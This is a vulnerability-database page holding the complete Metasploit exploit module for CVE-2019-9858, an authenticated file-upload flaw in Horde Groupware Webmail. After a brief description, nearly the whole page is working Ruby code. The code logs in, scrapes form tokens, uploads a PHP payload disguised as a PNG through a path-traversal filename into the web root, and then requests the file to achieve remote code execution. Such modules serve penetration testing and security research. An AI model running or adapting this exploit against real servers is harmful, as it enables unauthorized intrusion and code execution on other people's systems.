Horde Form File Upload Vulnerability

2019-03-29T12:31:14
ID MSF:EXPLOIT/MULTI/HTTP/HORDE_FORM_FILE_UPLOAD
Type metasploit
Reporter Rapid7
Modified 2019-04-09T18:43:54

Description

Horde Groupware Webmail contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. The exploitation requires the Turba subcomponent to be installed. This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            =&gt; 'Horde Form File Upload Vulnerability',
      'Description'     =&gt; %q{
          Horde Groupware Webmail contains a flaw that allows an authenticated remote
          attacker to execute arbitrary PHP code. The exploitation requires the Turba
          subcomponent to be installed.

          This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent &lt; 2.0.19.
        },
      'License'         =&gt; MSF_LICENSE,
      'Author'          =&gt;
        [
          'Ratiosec',
        ],
      'References'      =&gt;
        [
          ['CVE', '2019-9858'],
          ['URL', 'https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/'],
        ],
      'DisclosureDate'  =&gt; 'Mar 24 2019',
      'Platform'        =&gt; 'php',
      'Arch'            =&gt; ARCH_PHP,
      'Targets'         =&gt;
        [
          ['Automatic', { }],
        ],
      'DefaultTarget'   =&gt; 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
        OptString.new('PASSWORD',   [true, 'The password to authenticate with']),
        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www/html'])
        # Appears to be '/usr/share/horde/' if installed with apt
      ])
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def webroot
    datastore['WEB_ROOT']
  end

  def horde_login(user, pass)
    res = send_request_cgi(
      'method'      =&gt; 'GET',
      'uri'         =&gt; normalize_uri(target_uri, 'login.php')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("Logging in...")
    res = send_request_cgi(
      'method'      =&gt; 'POST',
      'uri'         =&gt; normalize_uri(target_uri, 'login.php'),
      'cookie'      =&gt; session_cookie,
      'vars_post'   =&gt; {
        'horde_user'  =&gt; user,
        'horde_pass'  =&gt; pass,
        'login_post'    =&gt; '1'
      }
    )

    return res.get_cookies if res && res.code == 302
    []
  end

  def get_tokens(cookie)
    res = send_request_cgi(
      'method'      =&gt; 'GET',
      'uri'         =&gt; normalize_uri(target_uri, 'turba', 'add.php'),
      'cookie'      =&gt; cookie
    )

    if res && res.code == 200
      source_tokens = res.body.scan(/turba\/add\.php\?source=(.+)"/).flatten
      unless source_tokens.empty?
        form_tokens = res.body.scan(/name="turba_form_addcontact_formToken" value="(.+)"/).flatten
        return source_tokens[0], form_tokens[0], res.get_cookies
      end
    end
    nil
  end

  def exploit
    vprint_status("Authenticating using #{username}:#{password}")

    cookie = horde_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? || cookie.empty?
    vprint_good("Authenticated to Horde.")

    tokens = get_tokens(cookie)
    fail_with(Failure::Unknown, 'Error extracting tokens.') if tokens.nil?
    source_token, form_token, secret_cookie = tokens

    vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")

    payload_name = Rex::Text.rand_text_alpha_lower(10..12)
    payload_path = File.join(webroot, "static", "#{payload_name}.php")
    payload_path_traversal = File.join("..", payload_path)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
    data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
    data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
    data.add_part(source_token, nil, nil, 'form-data; name="source"')
    data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
    post_data = data.to_s

    print_status("Uploading payload to #{payload_path_traversal}")
    res = send_request_cgi(
      'method'    =&gt; 'POST',
      'uri'       =&gt; normalize_uri(target_uri, 'turba', 'add.php'),
      'ctype'     =&gt; "multipart/form-data; boundary=#{data.bound}",
      'data'      =&gt; post_data,
      'cookie'    =&gt; cookie + ' ' + secret_cookie
    )

    fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200

    payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")

    vprint_status("Executing the payload at #{payload_url}.")
    res = send_request_cgi(
        'uri'     =&gt; payload_url,
        'method'  =&gt; 'GET',
    )

    register_files_for_cleanup(payload_path)
  end
end